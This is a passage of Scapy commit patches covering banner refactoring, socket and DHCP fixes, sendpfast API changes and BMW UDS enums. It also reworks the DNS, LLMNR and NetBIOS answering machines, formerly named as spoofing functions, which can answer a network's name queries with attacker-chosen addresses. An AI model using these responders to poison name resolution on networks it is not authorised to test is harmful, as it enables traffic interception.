get_terminal_width + if mini is None: + mini_banner = (get_terminal_width() or 84) <= 75 + else: + mini_banner = mini + + the_logo = [ + " ", + " aSPY//YASa ", + " apyyyyCY//////////YCa ", + " sY//////YSpcs scpCY//Pp ", + " ayp ayyyyyyySCP//Pp syY//C ", + " AYAsAYYYYYYYY///Ps cY//S", + " pCCCCY//p cSSps y//Y", + " SPPPP///a pP///AC//Y", + " A//A cyP////C", + " p///Ac sC///a", + " P////YCpc A//A", + " scccccp///pSP///p p//Y", + " sY/////////y caa S//P", + " cayCyayP//Ya pY/Ya", + " sY/PsY////YCc aC//Yp ", + " sc sccaCY//PCypaapyCP//YSs ", + " spCPY//////YPSps ", + " ccaacs ", + " ", + ] + + # Used on mini screens + the_logo_mini = [ + " .SYPACCCSASYY ", + "P /SCS/CCS ACS", + " /A AC", + " A/PS /SPPS", + " YP (SC", + " SPS/A. SC", + " Y/PACC PP", + " PY*AYC CAA", + " YYCY//SCYP ", + ] + + the_banner = [ + "", + "", + " |", + " | Welcome to Scapy", + " | Version %s" % conf.version, + " |", + " | https://github.com/secdev/scapy", + " |", + " | Have fun!", + " |", + ] + + if mini_banner: + the_logo = the_logo_mini + the_banner = [x[2:] for x in the_banner[3:-1]] + the_banner = [""] + the_banner + [""] + else: + quote, author = choice(QUOTES) + the_banner.extend(_prepare_quote(quote, author, max_len=39)) + the_banner.append(" |") + return "\n".join( + logo + banner for logo, banner in zip_longest( + (conf.color_theme.logo(line) for line in the_logo), + (conf.color_theme.success(line) for line in the_banner), + fillvalue="" + ) + ) + + def interact(mydict=None, argv=None, mybanner=None, loglevel=logging.INFO): # type: (Optional[Any], Optional[Any], Optional[Any], int) -> None """ @@ -635,72 +713,7 @@ def interact(mydict=None, argv=None, mybanner=None, loglevel=logging.INFO): ) if conf.fancy_banner: - from scapy.utils import get_terminal_width - mini_banner = (get_terminal_width() or 84) <= 75 - - the_logo = [ - " ", - " aSPY//YASa ", - " apyyyyCY//////////YCa ", - " sY//////YSpcs scpCY//Pp ", - " ayp ayyyyyyySCP//Pp syY//C ", - " AYAsAYYYYYYYY///Ps cY//S", - " pCCCCY//p cSSps y//Y", - " SPPPP///a pP///AC//Y", - " A//A cyP////C", - " p///Ac sC///a", - " P////YCpc A//A", - " scccccp///pSP///p p//Y", - " sY/////////y caa S//P", - " cayCyayP//Ya pY/Ya", - " sY/PsY////YCc aC//Yp ", - " sc sccaCY//PCypaapyCP//YSs ", - " spCPY//////YPSps ", - " ccaacs ", - " ", - ] - - # Used on mini screens - the_logo_mini = [ - " .SYPACCCSASYY ", - "P /SCS/CCS ACS", - " /A AC", - " A/PS /SPPS", - " YP (SC", - " SPS/A. SC", - " Y/PACC PP", - " PY*AYC CAA", - " YYCY//SCYP ", - ] - - the_banner = [ - "", - "", - " |", - " | Welcome to Scapy", - " | Version %s" % conf.version, - " |", - " | https://github.com/secdev/scapy", - " |", - " | Have fun!", - " |", - ] - - if mini_banner: - the_logo = the_logo_mini - the_banner = [x[2:] for x in the_banner[3:-1]] - the_banner = [""] + the_banner + [""] - else: - quote, author = choice(QUOTES) - the_banner.extend(_prepare_quote(quote, author, max_len=39)) - the_banner.append(" |") - banner_text = "\n".join( - logo + banner for logo, banner in zip_longest( - (conf.color_theme.logo(line) for line in the_logo), - (conf.color_theme.success(line) for line in the_banner), - fillvalue="" - ) - ) + banner_text = get_fancy_banner() else: banner_text = "Welcome to Scapy (%s)" % conf.version if mybanner is not None: diff --git a/scapy/pton_ntop.py b/scapy/pton_ntop.py index 8c4129ae748..9fa13e89012 100644 --- a/scapy/pton_ntop.py +++ b/scapy/pton_ntop.py @@ -87,6 +87,8 @@ def inet_pton(af, addr): addr = plain_str(addr) # Use inet_pton if available try: + if not socket.has_ipv6: + raise AttributeError return socket.inet_pton(af, addr) except AttributeError: try: @@ -134,6 +136,8 @@ def inet_ntop(af, addr): # Use inet_ntop if available addr = bytes_encode(addr) try: + if not socket.has_ipv6: + raise AttributeError return socket.inet_ntop(af, addr) except AttributeError: try: diff --git a/scapy/utils.py b/scapy/utils.py index 211378cc9eb..7a131a60b91 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -2927,8 +2927,9 @@ def get_terminal_width(): s = struct.pack('HHHH', 0, 0, 0, 0) x = fcntl.ioctl(1, termios.TIOCGWINSZ, s) sizex = struct.unpack('HHHH', x)[1] - except IOError: - pass + except (IOError, ModuleNotFoundError): + # If everything failed, return default terminal size + sizex = 79 return sizex From b95fdc7aa85c4b523c1f082aa449b4c8bccc07fa Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Wed, 25 Oct 2023 08:48:18 +0200 Subject: [PATCH 1110/1632] Improve exception handling in PeriodicSender Thread (#4152) --- scapy/utils.py | 13 ++++++++++--- 1 file changed, 10 insertions(+), 3 deletions(-) diff --git a/scapy/utils.py b/scapy/utils.py index 7a131a60b91..2fd4d0c89ca 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -3171,8 +3171,8 @@ def whois(ip_address): class PeriodicSenderThread(threading.Thread): - def __init__(self, sock, pkt, interval=0.5): - # type: (Any, _PacketIterable, float) -> None + def __init__(self, sock, pkt, interval=0.5, ignore_exceptions=True): + # type: (Any, _PacketIterable, float, bool) -> None """ Thread to send packets periodically Args: @@ -3187,13 +3187,20 @@ def __init__(self, sock, pkt, interval=0.5): self._socket = sock self._stopped = threading.Event() self._interval = interval + self._ignore_exceptions = ignore_exceptions threading.Thread.__init__(self) def run(self): # type: () -> None while not self._stopped.is_set() and not self._socket.closed: for p in self._pkts: - self._socket.send(p) + try: + self._socket.send(p) + except (OSError, TimeoutError) as e: + if self._ignore_exceptions: + return + else: + raise e self._stopped.wait(timeout=self._interval) if self._stopped.is_set() or self._socket.closed: break From 36c074d59e19168fe6e1582fd90a29a8265ac076 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Wed, 25 Oct 2023 08:48:56 +0200 Subject: [PATCH 1111/1632] Fix enum in UDS BMW definitions (#4150) --- scapy/contrib/automotive/bmw/definitions.py | 48 ++++++++++----------- 1 file changed, 24 insertions(+), 24 deletions(-) diff --git a/scapy/contrib/automotive/bmw/definitions.py b/scapy/contrib/automotive/bmw/definitions.py index 143827a5c38..3746fc9a296 100644 --- a/scapy/contrib/automotive/bmw/definitions.py +++ b/scapy/contrib/automotive/bmw/definitions.py @@ -252,30 +252,30 @@ def i2repr(self, pkt, x): class SVK_Entry(Packet): process_classes = { - "0x01": "HWEL", - "0x02": "HWAP", - "0x03": "HWFR", - "0x05": "CAFD", - "0x06": "BTLD", - "0x08": "SWFL", - "0x09": "SWFF", - "0x0A": "SWPF", - "0x0B": "ONPS", - "0x0F": "FAFP", - "0x1A": "TLRT", - "0x1B": "TPRG", - "0x07": "FLSL", - "0x0C": "IBAD", - "0x10": "FCFA", - "0x1C": "BLUP", - "0x1D": "FLUP", - "0xC0": "SWUP", - "0xC1": "SWIP", - "0xA0": "ENTD", - "0xA1": "NAVD", - "0xA2": "FCFN", - "0x04": "GWTB", - "0x0D": "SWFK", + 0x01: "HWEL", + 0x02: "HWAP", + 0x03: "HWFR", + 0x05: "CAFD", + 0x06: "BTLD", + 0x08: "SWFL", + 0x09: "SWFF", + 0x0A: "SWPF", + 0x0B: "ONPS", + 0x0F: "FAFP", + 0x1A: "TLRT", + 0x1B: "TPRG", + 0x07: "FLSL", + 0x0C: "IBAD", + 0x10: "FCFA", + 0x1C: "BLUP", + 0x1D: "FLUP", + 0xC0: "SWUP", + 0xC1: "SWIP", + 0xA0: "ENTD", + 0xA1: "NAVD", + 0xA2: "FCFN", + 0x04: "GWTB", + 0x0D: "SWFK", } """ HWEL - Hardware (Elektronik) - Hardware (Electronics) From 363d3766f53c3d55e92b0d51c5cdde7185733e3b Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Fri, 27 Oct 2023 15:14:25 +0200 Subject: [PATCH 1112/1632] More consistent sendpfast API (breaking) (#4157) --- scapy/sendrecv.py | 30 +++++++++++++++++------------- scapy/supersocket.py | 2 +- 2 files changed, 18 insertions(+), 14 deletions(-) diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index 5c7a5a2b3c5..c62ecc6901e 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -485,15 +485,16 @@ def sendp(x, # type: _PacketIterable @conf.commands.register -def sendpfast(x, # type: _PacketIterable - pps=None, # type: Optional[float] - mbps=None, # type: Optional[float] - realtime=False, # type: bool - loop=None, # type: Optional[int] - file_cache=False, # type: bool - iface=None, # type: Optional[_GlobInterfaceType] - replay_args=None, # type: Optional[List[str]] - parse_results=False, # type: bool +def sendpfast(x: _PacketIterable, + pps: Optional[float] = None, + mbps: Optional[float] = None, + realtime: bool = False, + count: Optional[int] = None, + loop: int = 0, + file_cache: bool = False, + iface: Optional[_GlobInterfaceType] = None, + replay_args: Optional[List[str]] = None, + parse_results: bool = False, ): # type: (...) -> Optional[Dict[str, Any]] """Send packets at layer 2 using tcpreplay for performance @@ -501,8 +502,8 @@ def sendpfast(x, # type: _PacketIterable :param pps: packets per second :param mbps: MBits per second :param realtime: use packet's timestamp, bending time with real-time value - :param loop: number of times to process the packet list. 0 implies - infinite loop + :param loop: send the packet indefinitely (default 0) + :param count: number of packets to send (default None=1) :param file_cache: cache packets in RAM instead of reading from disk at each iteration :param iface: output interface @@ -523,8 +524,11 @@ def sendpfast(x, # type: _PacketIterable else: argv.append("--topspeed") - if loop is not None: - argv.append("--loop=%i" % loop) + if count: + assert not loop, "Can't use loop and count at the same time in sendpfast" + argv.append("--loop=%i" % count) + elif loop: + argv.append("--loop=0") if file_cache: argv.append("--preload-pcap") diff --git a/scapy/supersocket.py b/scapy/supersocket.py index 06f7019a78f..0a05749f214 100644 --- a/scapy/supersocket.py +++ b/scapy/supersocket.py @@ -214,7 +214,7 @@ def close(self): def sr(self, *args, **kargs): # type: (Any, Any) -> Tuple[SndRcvList, PacketList] from scapy import sendrecv - ans, unans = sendrecv.sndrcv(self, *args, **kargs) # type: SndRcvList, PacketList # noqa: E501 + ans, unans = sendrecv.sndrcv(self, *args, **kargs) return ans, unans def sr1(self, *args, **kargs): From ba51704fcfc60094da386c3614fb52c348d82020 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Tue, 24 Oct 2023 23:22:32 +0200 Subject: [PATCH 1113/1632] Improve answering machines, dns_resolve, renames --- doc/scapy/routing.rst | 1 + doc/scapy/usage.rst | 26 ++++--- scapy/ansmachine.py | 22 +++++- scapy/layers/dhcp.py | 2 +- scapy/layers/dns.py | 151 +++++++++++++++++++++--------------- scapy/layers/llmnr.py | 15 +++- scapy/layers/netbios.py | 2 +- test/answering_machines.uts | 14 +++- test/scapy/layers/dhcp.uts | 2 +- 9 files changed, 154 insertions(+), 81 deletions(-) diff --git a/doc/scapy/routing.rst b/doc/scapy/routing.rst index eec9dffbca1..8355ce0c352 100644 --- a/doc/scapy/routing.rst +++ b/doc/scapy/routing.rst @@ -6,6 +6,7 @@ Scapy maintains its own network stack, which is independent from the one of your It possesses its own *interfaces list*, *routing table*, *ARP cache*, *IPv6 neighbour* cache, *nameservers* config... and so on, all of which is configurable. Here are a few examples of where this is used:: + - When you use ``sr()/send()``, Scapy will use internally its own routing table (``conf.route``) in order to find which interface to use, and eventually send an ARP request. - When using ``dns_resolve()``, Scapy uses its own nameservers list (``conf.nameservers``) to perform the request - etc. diff --git a/doc/scapy/usage.rst b/doc/scapy/usage.rst index dc4aca70014..e78c0947f46 100644 --- a/doc/scapy/usage.rst +++ b/doc/scapy/usage.rst @@ -1434,28 +1434,32 @@ Visualizing the results in a list:: >>> res.nsummary(prn=lambda s,r: r.src, lfilter=lambda s,r: r.haslayer(ISAKMP) ) -DNS spoof ---------- +DNS server +---------- -See :class:`~scapy.layers.dns.DNS_am`:: +By default, ``dnsd`` uses a joker (IPv4 only): it answers to all unknown servers with the joker. See :class:`~scapy.layers.dns.DNS_am`:: - >>> dns_spoof(iface="tap0", joker="192.168.1.1") + >>> dnsd(iface="tap0", match={"google.com": "1.1.1.1"}, joker="192.168.1.1") -LLMNR spoof ------------ +You can also use ``relay=True`` to replace the joker behavior with a forward to a server included in ``conf.nameservers``. + +LLMNR server +------------ See :class:`~scapy.layers.llmnr.LLMNR_am`:: >>> conf.iface = "tap0" - >>> llmnr_spoof(iface="tap0", from_ip=Net("10.0.0.1/24")) + >>> llmnrd(iface="tap0", from_ip=Net("10.0.0.1/24")) -Netbios spoof -------------- +Note that ``llmnrd`` extends the ``dnsd`` API. + +Netbios server +-------------- See :class:`~scapy.layers.netbios.NBNS_am`:: - >>> nbns_spoof(iface="eth0") # With local IP - >>> nbns_spoof(iface="eth0", ip="192.168.122.17") # With some other IP + >>> nbnsd(iface="eth0") # With local IP + >>> nbnsd(iface="eth0", ip="192.168.122.17") # With some other IP Node status request (get NetbiosName from IP) --------------------------------------------- diff --git a/scapy/ansmachine.py b/scapy/ansmachine.py index ee8b428b52d..e821df54014 100644 --- a/scapy/ansmachine.py +++ b/scapy/ansmachine.py @@ -13,6 +13,7 @@ import abc import functools +import threading import socket import warnings @@ -225,12 +226,14 @@ def sniff_bg(self): class AnsweringMachineTCP(AnsweringMachine[Packet]): """ An answering machine that use the classic socket.socket to - answer multiple clients + answer multiple TCP clients """ + TYPE = socket.SOCK_STREAM + def parse_options(self, port=80, cls=conf.raw_layer): # type: (int, Type[Packet]) -> None self.port = port - self.cls = conf.raw_layer + self.cls = cls def close(self): # type: () -> None @@ -239,7 +242,7 @@ def close(self): def sniff(self): # type: () -> None from scapy.supersocket import StreamSocket - ssock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + ssock = socket.socket(socket.AF_INET, self.TYPE) ssock.bind( (get_if_addr(self.optsniff.get("iface", conf.iface)), self.port)) ssock.listen() @@ -267,6 +270,19 @@ def sniff(self): self.close() ssock.close() + def sniff_bg(self): + # type: () -> None + self.sniffer = threading.Thread(target=self.sniff) # type: ignore + self.sniffer.start() + def make_reply(self, req, address=None): # type: (Packet, Optional[Any]) -> Packet return req + + +class AnsweringMachineUDP(AnsweringMachineTCP): + """ + An answering machine that use the classic socket.socket to + answer multiple UDP clients + """ + TYPE = socket.SOCK_DGRAM diff --git a/scapy/layers/dhcp.py b/scapy/layers/dhcp.py index ce493813367..8ff0e6ec786 100644 --- a/scapy/layers/dhcp.py +++ b/scapy/layers/dhcp.py @@ -593,7 +593,7 @@ def parse_options(self, network="192.168.1.0/24", gw="192.168.1.1", nameserver=None, - domain="localnet", + domain=None, renewal_time=60, lease_time=1800): """ diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index 6bed0be230c..606fde284f9 100644 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -1072,13 +1072,13 @@ def mysummary(self): name = "" if self.qr: type = "Ans" - if self.an and isinstance(self.an, DNSRR): - name = ' "%s"' % self.an[0].rdata + if self.an and isinstance(self.an[0], DNSRR): + name = ' %s' % self.an[0].rdata else: type = "Qry" - if self.qd and isinstance(self.qd, DNSQR): - name = ' "%s"' % self.qd[0].qname - return 'DNS %s%s ' % (type, name) + if self.qd and isinstance(self.qd[0], DNSQR): + name = ' %s' % self.qd[0].qname + return 'DNS %s%s' % (type, name) def post_build(self, pkt, pay): if isinstance(self.underlayer, TCP) and self.length is None: @@ -1129,13 +1129,16 @@ def pre_dissect(self, s): @conf.commands.register -def dns_resolve(qname, qtype="A", raw=False, verbose=1, **kwargs): +def dns_resolve(qname, qtype="A", raw=False, verbose=1, timeout=3, **kwargs): """ Perform a simple DNS resolution using conf.nameservers with caching :param qname: the name to query :param qtype: the type to query (default A) :param raw: return the whole DNS packet (default False) + :param verbose: show verbose errors + :param timeout: seconds until timeout (per server) + :raise TimeoutError: if no DNS servers were reached in time. """ # Unify types qtype = DNSQR.qtype.any2i_one(None, qtype) @@ -1149,7 +1152,7 @@ def dns_resolve(qname, qtype="A", raw=False, verbose=1, **kwargs): if answer: return answer - kwargs.setdefault("timeout", 3) + kwargs.setdefault("timeout", timeout) kwargs.setdefault("verbose", 0) res = None for nameserver in conf.nameservers: @@ -1203,7 +1206,8 @@ def dns_resolve(qname, qtype="A", raw=False, verbose=1, **kwargs): # Cache it _dns_cache[cache_ident] = answer return answer - return None + else: + raise TimeoutError @conf.commands.register @@ -1247,14 +1251,15 @@ def dyndns_del(nameserver, name, type="ALL", ttl=10): class DNS_am(AnsweringMachine): - function_name = "dns_spoof" + function_name = "dnsd" filter = "udp port 53" - cls = DNS # We use this automaton for llmnr_spoof + cls = DNS # We also use this automaton for llmnrd def parse_options(self, joker=None, match=None, srvmatch=None, joker6=False, + relay=False, from_ip=None, from_ip6=None, src_ip=None, @@ -1265,40 +1270,50 @@ def parse_options(self, joker=None, Set to False to disable, None to mirror the interface's IP. :param joker6: default IPv6 for unresolved domains (Default: False) set to False to disable, None to mirror the interface's IPv6. + :param relay: relay unresolved domains to conf.nameservers (Default: False). :param match: a dictionary of {name: val} where name is a string representing a domain name (A, AAAA) and val is a tuple of 2 elements, each - representing an IP or a list of IPs + representing an IP or a list of IPs. If val is a single element, + (A, None) is assumed. :param srvmatch: a dictionary of {name: (port, target)} used for SRV :param from_ip: an source IP to filter. Can contain a netmask :param from_ip6: an source IPv6 to filter. Can contain a netmask :param ttl: the DNS time to live (in seconds) - :param src_ip: + :param src_ip: override the source IP :param src_ip6: Example: - >>> dns_spoof(joker="192.168.0.2", iface="eth0") - >>> dns_spoof(match={ + $ sudo iptables -I OUTPUT -p icmp --icmp-type 3/3 -j DROP + >>> dnsd(match={"google.com": "1.1.1.1"}, joker="192.168.0.2", iface="eth0") + >>> dnsd(srvmatch={ ... "_ldap._tcp.dc._msdcs.DOMAIN.LOCAL.": (389, "srv1.domain.local") ... }) """ + def normv(v): + if isinstance(v, (tuple, list)) and len(v) == 2: + return v + elif isinstance(v, str): + return (v, None) + else: + raise ValueError("Bad match value: '%s'" % repr(v)) + + def normk(k): + k = bytes_encode(k).lower() + if not k.endswith(b"."): + k += b"." + return k if match is None: self.match = {} else: - assert all(isinstance(x, (tuple, list)) for x in match.values()), ( - "'match' values must be a tuple of 2 elements: ('', '')" - ". They can be None" - ) - self.match = {bytes_encode(k): v for k, v in match.items()} + self.match = {normk(k): normv(v) for k, v in match.items()} if srvmatch is None: self.srvmatch = {} else: - assert all(isinstance(x, (tuple, list)) for x in srvmatch.values()), ( - "'srvmatch' values must be a tuple of 2 elements: (port, 'target')" - ) - self.srvmatch = {bytes_encode(k): v for k, v in srvmatch.items()} + self.srvmatch = {normk(k): normv(v) for k, v in srvmatch.items()} self.joker = joker self.joker6 = joker6 + self.relay = relay if isinstance(from_ip, str): self.from_ip = Net(from_ip) else: @@ -1341,51 +1356,65 @@ def make_reply(self, req): if rq.qtype == 28: # AAAA try: - rdata = self.match[rq.qname][1] + rdata = self.match[rq.qname.lower()][1] except KeyError: - if self.joker6 is False: - return - rdata = self.joker6 or get_if_addr6( - self.optsniff.get("iface", conf.iface) - ) + if self.relay or self.joker6 is False: + rdata = None + else: + rdata = self.joker6 or get_if_addr6( + self.optsniff.get("iface", conf.iface) + ) elif rq.qtype == 1: # A try: - rdata = self.match[rq.qname][0] + rdata = self.match[rq.qname.lower()][0] except KeyError: - if self.joker is False: - return - rdata = self.joker or get_if_addr( - self.optsniff.get("iface", conf.iface) - ) - if rdata is None: - # Ignore None - return - # Common A and AAAA - if not isinstance(rdata, list): - rdata = [rdata] - ans.extend([ - DNSRR(rrname=rq.qname, ttl=self.ttl, rdata=x, type=rq.qtype) - for x in rdata - ]) + if self.relay or self.joker is False: + rdata = None + else: + rdata = self.joker or get_if_addr( + self.optsniff.get("iface", conf.iface) + ) + if rdata is not None: + # Common A and AAAA + if not isinstance(rdata, list): + rdata = [rdata] + ans.extend([ + DNSRR(rrname=rq.qname, ttl=self.ttl, rdata=x, type=rq.qtype) + for x in rdata + ]) + continue # next elif rq.qtype == 33: # SRV try: - port, target = self.srvmatch[rq.qname] + port, target = self.srvmatch[rq.qname.lower()] + ans.append(DNSRRSRV( + rrname=rq.qname, + port=port, + target=target, + weight=100, + ttl=self.ttl + )) + continue # next except KeyError: - return - ans.append(DNSRRSRV( - rrname=rq.qname, - port=port, - target=target, - weight=100, - ttl=self.ttl - )) - else: - # Not handled - continue - # Common: All - if not ans: - return - resp /= self.cls(id=req.id, qr=1, qd=req.qd, an=ans) + # No result + pass + # It it arrives here, there is currently no answer + if self.relay: + # Relay mode ? + try: + _rslv = dns_resolve(rq.qname, qtype=rq.qtype) + if _rslv is not None: + ans.append(_rslv) + continue # next + except TimeoutError: + pass + # Error + break + else: + # All rq were answered + resp /= self.cls(id=req.id, qr=1, qd=req.qd, an=ans) + return resp + # An error happened + resp /= self.cls(id=req.id, qr=1, qd=req.qd, rcode=3) return resp diff --git a/scapy/layers/llmnr.py b/scapy/layers/llmnr.py index 89815e5f200..fef6a97c58a 100644 --- a/scapy/layers/llmnr.py +++ b/scapy/layers/llmnr.py @@ -14,7 +14,13 @@ import struct -from scapy.fields import BitEnumField, BitField, ShortField +from scapy.fields import ( + BitEnumField, + BitField, + DestField, + DestIP6Field, + ShortField, +) from scapy.packet import Packet, bind_layers, bind_bottom_up from scapy.compat import orb from scapy.layers.inet import UDP @@ -88,9 +94,14 @@ def dispatch_hook(cls, _pkt=None, *args, **kargs): bind_bottom_up(UDP, _LLMNR, sport=5355) bind_layers(UDP, _LLMNR, sport=5355, dport=5355) +DestField.bind_addr(LLMNRQuery, _LLMNR_IPv4_mcast_addr, dport=5355) +DestField.bind_addr(LLMNRResponse, _LLMNR_IPv4_mcast_addr, dport=5355) +DestIP6Field.bind_addr(LLMNRQuery, _LLMNR_IPv6_mcast_Addr, dport=5355) +DestIP6Field.bind_addr(LLMNRResponse, _LLMNR_IPv6_mcast_Addr, dport=5355) + class LLMNR_am(DNS_am): - function_name = "llmnr_spoof" + function_name = "llmnrd" filter = "udp port 5355" cls = LLMNRQuery diff --git a/scapy/layers/netbios.py b/scapy/layers/netbios.py index 678fa6c4f7c..07af77b4365 100644 --- a/scapy/layers/netbios.py +++ b/scapy/layers/netbios.py @@ -355,7 +355,7 @@ def post_build(self, pkt, pay): class NBNS_am(AnsweringMachine): - function_name = "nbns_spoof" + function_name = "nbnsd" filter = "udp port 137" sniff_options = {"store": 0} diff --git a/test/answering_machines.uts b/test/answering_machines.uts index bb80f66c391..e28de57daf2 100644 --- a/test/answering_machines.uts +++ b/test/answering_machines.uts @@ -37,7 +37,8 @@ def check_DHCP_am_reply(packet): test_am(DHCP_am, Ether()/IP()/UDP()/BOOTP(op=1)/DHCP(options=[('message-type', 'request')]), - check_DHCP_am_reply) + check_DHCP_am_reply, + domain="localnet") = ARP_am @@ -73,6 +74,17 @@ test_am(DNS_am, check_DNS_am_reply, joker="192.168.1.1") +def check_DNS_am_reply2(packet): + assert DNS in packet and packet[DNS].ancount == 2 + assert packet[DNS].an[0].rdata == "128.0.0.1" + assert packet[DNS].an[1].rdata == "::1" + +test_am(DNS_am, + IP(b'E\x00\x00H\x00\x01\x00\x00@\x11|\xa2\x7f\x00\x00\x01\x7f\x00\x00\x01\x005\x005\x004\xe8\x9a\x00\x00\x01\x00\x00\x02\x00\x00\x00\x00\x00\x00\x06gaagle\x03com\x00\x00\x01\x00\x01\x06google\x03com\x00\x00\x1c\x00\x01'), + check_DNS_am_reply2, + match={"google.com": ("127.0.0.1", "::1"), "gaagle.com": "128.0.0.1"}, + joker=False) + = DHCPv6_am - Basic Instantiaion ~ osx netaccess a = DHCPv6_am() diff --git a/test/scapy/layers/dhcp.uts b/test/scapy/layers/dhcp.uts index 3010d3e0933..3d8dcda99c5 100644 --- a/test/scapy/layers/dhcp.uts +++ b/test/scapy/layers/dhcp.uts @@ -121,5 +121,5 @@ assert DHCPRevOptions['static-routes'][0] == 33 assert dhcpd import IPython -assert IPython.lib.pretty.pretty(dhcpd) == '' +assert IPython.lib.pretty.pretty(dhcpd) == '' From 2f86cff6e1bec0c176b9469dd9054e3bdce3d6a3 Mon Sep 17 00:00:00 2001 From: devrim-ayyildiz <39125734+devrim-ayyildiz@users.noreply.github.com> Date: Wed, 1 Nov 2023 07:13:08 +0100 Subject: [PATCH 1114/1632] Pass the fd to underlying NativeCANSocket (#4158) ISOTPSoftSocket should pass the fd (CanFD support) to the NativeCANSocket instance it creates. Otherwise it will always be created as non CanFD. --- scapy/contrib/isotp/isotp_soft_socket.py | 2 +- test/contrib/isotp_soft_socket.uts | 14 ++++++++++++++ 2 files changed, 15 insertions(+), 1 deletion(-) diff --git a/scapy/contrib/isotp/isotp_soft_socket.py b/scapy/contrib/isotp/isotp_soft_socket.py index 3b8dc7f80ce..119917e5f44 100644 --- a/scapy/contrib/isotp/isotp_soft_socket.py +++ b/scapy/contrib/isotp/isotp_soft_socket.py @@ -133,7 +133,7 @@ def __init__(self, if LINUX and isinstance(can_socket, str): from scapy.contrib.cansocket_native import NativeCANSocket - can_socket = NativeCANSocket(can_socket) + can_socket = NativeCANSocket(can_socket, fd=fd) elif isinstance(can_socket, str): raise Scapy_Exception("Provide a CANSocket object instead") diff --git a/test/contrib/isotp_soft_socket.uts b/test/contrib/isotp_soft_socket.uts index b2b7295805d..ece7ef5f621 100644 --- a/test/contrib/isotp_soft_socket.uts +++ b/test/contrib/isotp_soft_socket.uts @@ -11,6 +11,8 @@ from scapy.layers.can import * from scapy.contrib.isotp import * from scapy.contrib.isotp.isotp_soft_socket import TimeoutScheduler from test.testsocket import TestSocket, cleanup_testsockets +with open(scapy_path("test/contrib/automotive/interface_mockup.py")) as f: + exec(f.read()) = Redirect logging import logging @@ -58,6 +60,18 @@ assert sniffed[0]['ISOTP'].rx_ext_address == 0xEA + ISOTPSoftSocket tests += CAN socket FD +~ not_pypy needs_root linux vcan_socket + +with ISOTPSoftSocket(iface0, tx_id=0x641, rx_id=0x241, fd=True) as s: + assert s.impl.can_socket.fd == True + += CAN socket non-FD +~ not_pypy needs_root linux vcan_socket + +with ISOTPSoftSocket(iface0, tx_id=0x641, rx_id=0x241) as s: + assert s.impl.can_socket.fd == False + = Single-frame receive with TestSocket(CAN) as cans, TestSocket(CAN) as stim, ISOTPSoftSocket(cans, tx_id=0x641, rx_id=0x241) as s: From 0474c37bf1d147c969173d52ab3ac76d2404d981 Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Thu, 2 Nov 2023 09:56:57 +0300 Subject: [PATCH 1115/1632] DHCPv4: add the rapid commit option (#4166) --- scapy/layers/dhcp.py | 1 + test/scapy/layers/dhcp.uts | 6 ++++-- 2 files changed, 5 insertions(+), 2 deletions(-) diff --git a/scapy/layers/dhcp.py b/scapy/layers/dhcp.py index 8ff0e6ec786..4875dbf1e4a 100644 --- a/scapy/layers/dhcp.py +++ b/scapy/layers/dhcp.py @@ -303,6 +303,7 @@ def randval(self): 77: "user_class", 78: "slp_service_agent", 79: "slp_service_scope", + 80: "rapid_commit", 81: "client_FQDN", 82: "relay_agent_information", 85: IPField("nds-server", "0.0.0.0"), diff --git a/test/scapy/layers/dhcp.uts b/test/scapy/layers/dhcp.uts index 3d8dcda99c5..2202eb262f4 100644 --- a/test/scapy/layers/dhcp.uts +++ b/test/scapy/layers/dhcp.uts @@ -47,8 +47,8 @@ assert s3 == b'E\x00\x01=\x00\x01\x00\x00@\x11{\xad\x7f\x00\x00\x01\x7f\x00\x00\ s4 = raw(IP(src="127.0.0.1")/UDP()/BOOTP(chaddr="00:01:02:03:04:05")/DHCP(options=[("mud-url", "https://example.org"), ("captive-portal", "https://example.com"), ("ipv6-only-preferred", 0xffffffff), "end"])) assert s4 == b"E\x00\x01=\x00\x01\x00\x00@\x11{\xad\x7f\x00\x00\x01\x7f\x00\x00\x01\x00C\x00D\x01)L\xd7\x01\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0000:01:02:03:04:0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00c\x82Sc\xa1\x13https://example.orgr\x13https://example.com\x6c\x04\xff\xff\xff\xff\xff" -s5 = raw(IP(src="127.0.0.1")/UDP()/BOOTP(chaddr="00:01:02:03:04:05")/DHCP(options=[("classless_static_routes", "192.168.123.4/32:10.0.0.1", "169.254.254.0/24:10.0.1.2"), "end"])) -assert s5 == b'E\x00\x01 